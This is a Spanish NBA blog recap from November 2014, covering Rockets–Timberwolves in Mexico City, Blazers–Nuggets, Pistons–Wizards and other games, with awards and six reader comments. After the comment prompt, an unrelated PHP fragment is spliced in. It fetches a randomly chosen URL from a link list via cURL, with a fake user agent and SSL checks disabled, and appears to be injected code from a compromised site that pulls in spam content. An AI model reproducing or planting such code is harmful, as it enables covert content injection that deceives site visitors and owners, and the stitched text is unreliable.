La Crónica: Hacer historia al sur de la frontera

13 de November de 2014 por txusma

Esta madrugada Houston, Portland y Washington han confirmado su buen inicio de campaña con sus respectivas victorias y otros menos habituales como Oklahoma City, Indiana o Orlando también han saboreado las mieles del triunfo.

Houston Rockets 113 – Minnesota Timberwolves 101

Los tejanos se ponen 7-1 y ya se han convertido en el primer equipo de la historia en comenzar la temporada con 8 partidos consecutivos anotando más de 10 triples. Con la amenaza para los rivales que supone esta estadística y la presencia interior de Dwight Howard, las victorias van cayendo siempre por más de 10 puntos. Anoche, en el partido celebrado en Ciudad de México, Howard consiguió otro doble-doble y con la ayuda de Harden, Ariza y el rookie Kostas Papanikolau propinaron a los Wolves su tercera derrota consecutiva.

mexico

Portland Trail Blazers 130 – Denver Nuggets 113

Back-to-back para los Blazers y victoria fuera de casa. Ni siquiera hizo falta un gran partido de LaMarcus Aldridge. Con Damian Lillard y un acierto global del resto de compañeros los de Oregon tuvieron más que suficiente. Su primera parte fue excelsa: anotaron nada menos que 84 puntos (a dos del récord hisótorico de la franquicia) y al descanso mandaban  por 34. Los jugadores de los Nuggets no sabían ni por donde les llegaban los golpes y rápidamente se dieron cuenta que, a pesar de estar todos sanos por primera vez esta temporada, poco podrían hacer ante semejante aluvión.

Detroit Pistons 103 – Washington Wizards 107

Al acabar el primer cuarto, Brandon Jennings había anotado 16 puntos y los Pistons estaban 10 arriba. La victoria no iba a ser tan fácil para los capitalinos como se presumía antes de empezar el partido. Al final, el base de Detroit acabó con 32 puntos pero se quedó sin gasolina en el último cuarto, momento en que los locales, liderados por John Wall, dieron el golpe de gracia a sus rivales.

Indiana Pacers 81 – Miami Heat 75

Resultado de Euroliga en un partido brusco, lento y dominado por las defensas. Sólo por comparar, los Blazers en una parte fueron capaces de anotar más puntos que los Pacers en todo el partido (84 contra 81). Miami, que tan buen sabor de boca nos estaba dejando hasta ahora, se estampó contra la defensa que lidera un Roy Hibbert que parece haber recuperado el nivel de sus grandes noches. Chris Bosh no fue capaz de superarle en ningún momento y por primera vez esta temporada no llegó a los 20 puntos. Ante la ausencia de hasta 5 de sus jugadores más destacados, en los Pacers el mejor fue Chris Copeland.

Orlando Magic 97 – New York Knicks 95

Sexta derrota consecutiva de los Knicks y noveno partido sin alcanzar los 100 puntos. Los aficionados de la Gran Manzana están acostumbrados a sufrir pero lo de este año empieza a ser muy doloroso sobretodo por las expectativas que habían levantado las incorporaciones de Phil Jackson y Derek Fisher. Carmelo Anthony y el resto de sus compañeros no acaban de entender las clases de geometría de sus profesores y más que triangulos construyen cuadrados al lado contrario de donde está la pelota para que el Anthony, Smith o Hardaway de turno se juegue la canasta como buenamente pueda. Ayer les arrebataron la victoria un casa unos inexpertos Magic que se aplicaron en defensa y jugaron mejor que ellos los momentos calientes del partido. Evan Fournier sigue mostrando un buen nivel y lideró a los suyos con 28 puntos.

El resto

Segunda derrota en dos noches para los Lakers en su partido en New Orleans, con Davis y Evans estelares y rajada de Byron Scott sobre la defensa del equipo (102-109). Victoria de los Haws en casa ante los Jazz (97-100) con un Paul Millsap inconmensurable y un triple decisivo desde la esquina de Kyle Korver; victoria también de los Thunder en Boston (109-94) con 28 puntos de Reggie Jackson y Anthony Morrow; y victoria de los Suns en casa ante los Nets de nuevo con Gerald Green e Isaiah Thomas como destacados. Si tan bien les va así, ¿se plantearán los de Arizona el traspaso de Eric Bledsoe en algún momento?

PREMIOS

milsapMVP: A Millsap no le supieron poner bien el nombre en la camiseta pero eso no le impidió destrozar a los Jazz con 30 puntos, 17 rebotes, 3 asistencias, 2 robos y 2 tapones. No fue la única gran actuación de la noche: Anthony Davis y sus 25 puntos, 12 rebotes y 6 tapones, John Wall (27-11), Lillard (27-5-9), la segunda parte de Reggie Jackson en Boston para acabar con 28-8, o las parejas Howard & Harden (45 puntos, 14 rebotes, 12 asistencias, 4 tapones), Vucevic & Fournier (48 puntos, 15 rebotes, 4 asistencias, 4 robos) y Thomas & Gerald Green (49 puntos, 9 rebotes, 5 asistencias) también merecen ser mencionados aquí.

Rookie: Destacaron dos de los novatos europeos, Bojan Bogdanovic y Kostas Papanikolau, ambos con 14 puntos. Tarik Black, compañero del griego en los Rockets, logró 10 puntos y 6 rebotes en pocos minutos del mismo partido en el que Andrew Wiggins consiguió 15 puntos y Zach Lavine se fue a 8 puntos y 9 asistencias.

Sorpresa: Cuánto necesitaban los Thunder a Anthony Morrow, que en su segundo partido como jugador de OKC se exhibió con 28 puntos en una espectacular serie de 11/16 tiros y 4/5 triples. Aunque la gran sorpresa del día pueden ser los 4 triples de Rajon Rondo.

Decepción: ¿Qué le pasa a Andre Drummond? Anoche, 2 tristes puntos y 5 rebotes para un jugador al que veíamos ante el año de su explosión definitiva. En los dos últimos partidos, Drummond suma 4 puntos con 1/8 en tiros. También decepcionaron Chris Bosh y Deng (14 puntos, 9 rebotes entre ambos) y alcanza niveles realmente preocupantes el caso de los Nuggets, en caída libre y anoche con mínimas aportaciones de Afflalo y Faried.

Mayor esfuerzo en vano: Hay donde elegir. Brandon Jennings 32-10 (11/19), Rondo 20-12-9-2 con 4/7 triples, Kobe 33-4-5, Lawson 32-3-6-2… protagonizaron magníficas actuaciones que no obtuvieron el premio de la victoria pero sí el nuestro como mayores esfuerzos en vano.

Top 10

Comenta

6 comentarios a esta entrada

  1. Nacho dice:
    #1

    Lo de Fournier está siendo impresionante.
    Y a la pregunta del día, sí, deben traspasar a Bledsoe y buscar un F o C que les de el empujón definitivo a PO.
    Lo de los Nuggets empieza a ser la mayor decepción de la temporada. Si no existieran los Knicks, claro.

      Citar

  2. MagicJohnson32 dice:
    #2

    Nacho:
    Lo de Fournier está siendo impresionante.
    Y a la pregunta del día, sí, deben traspasar a Bledsoe y buscar un F o C que les de el empujón definitivo a PO.
    Lo de los Nuggets empieza a ser la mayor decepción de la temporada. Si no existieran los Knicks, claro.

    Yo aún estoy esperando que Denise me reconozca su gran error con Fournier y que yo tenía razón.

    (cómo mola anotarse tantos, jajaja)

      Citar

  3. franitis dice:
    #3

    Yo estoy alelado con la derrota de C’s contra el Thunder… Sin Westbrook ni Durant y pierden en casa con el parcial que se estaban marcando en el primer cuarto… La gracia es que me jugué en el 2k15 un previo y Jackson me hizo un hijo o dos ¿¿PREMONICIÓN?? No juego más que me da miedito…

      Citar

  4. Denise dice:
    #4

    MagicJohnson32: Yo aún estoy esperando que Denise me reconozca su gran error con Fournier y que yo tenía razón.

    (cómo mola anotarse tantos, jajaja)

    Jaja, venga si, por ahora llevas razón con la Sota de Oro, y te está dando bastante rendimiento en la Hoops. Aun así, sigo pensando que el trade de Afflalo fue un timo.
    Otra noche sin jugar de Harkless, lo malo, que Orlando ganó y cada victoria de los Magic le da aire al nefasto Vaughn.

      Citar

  5. Azabel dice:
    #5

    “a rio revuelto ganancia de pescadores” dice el dicho, y vaya que hay olor a rio revuelto en los Nuggets, y vaya que si hay algun pescador inteligente puede llevarse una ganancia ahi

    Quierase o no los Nuggets tienen varios jugadores de equipo de PO, tanto en los titulares como en los suplentes, individualmente mucho de ellos son muy muy buenos

    Afflalo, Chalnder, Gallinari, Lawson, Faried, son jugadores semi estelares de la lia, o los casi ALL STAR

    despues tienen una camada de buenos jugadores de un escalon inferior como Mozgog, Nate Robinson, Arthut, Foye, Hickson y McGee

    hoy no van a nignun ladoi, la temporada pasado no fueron a ningun lado, por lo que el borron y cuenta nueva se antoja URGENTE

    si son inteligentes desarmando este equipo, pueden sacar rondas,m expirings y espacio y arrancar de 0, es lo que yo haria

    ahora es turno de los compradores, quien se lleva a quien?????

      Citar

  6. rumbero dice:
    #6

    franitis:
    Yo estoy alelado con la derrota de C’s contra el Thunder… Sin Westbrook ni Durant y pierden en casa con el parcial que se estaban marcando en el primer cuarto… La gracia es que me jugué en el 2k15 un previo y Jackson me hizo un hijo o dos ¿¿PREMONICIÓN?? No juego más que me da miedito…

    Es que lo de Jackson y Morrow fue escandaloso. El primero reventó el tercer cuarto cuando iban unos 10 abajo, pero es que lo de Morrow yo aún no me lo creo. Para mi que era Durant disfrazado. 19 puntos en el último cuarto y sino recuerdo mal sin fallo alguno. Todo eso el mismo día que Rondo tira por encima del 50% con 4/7 en triples. Ver para creer

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>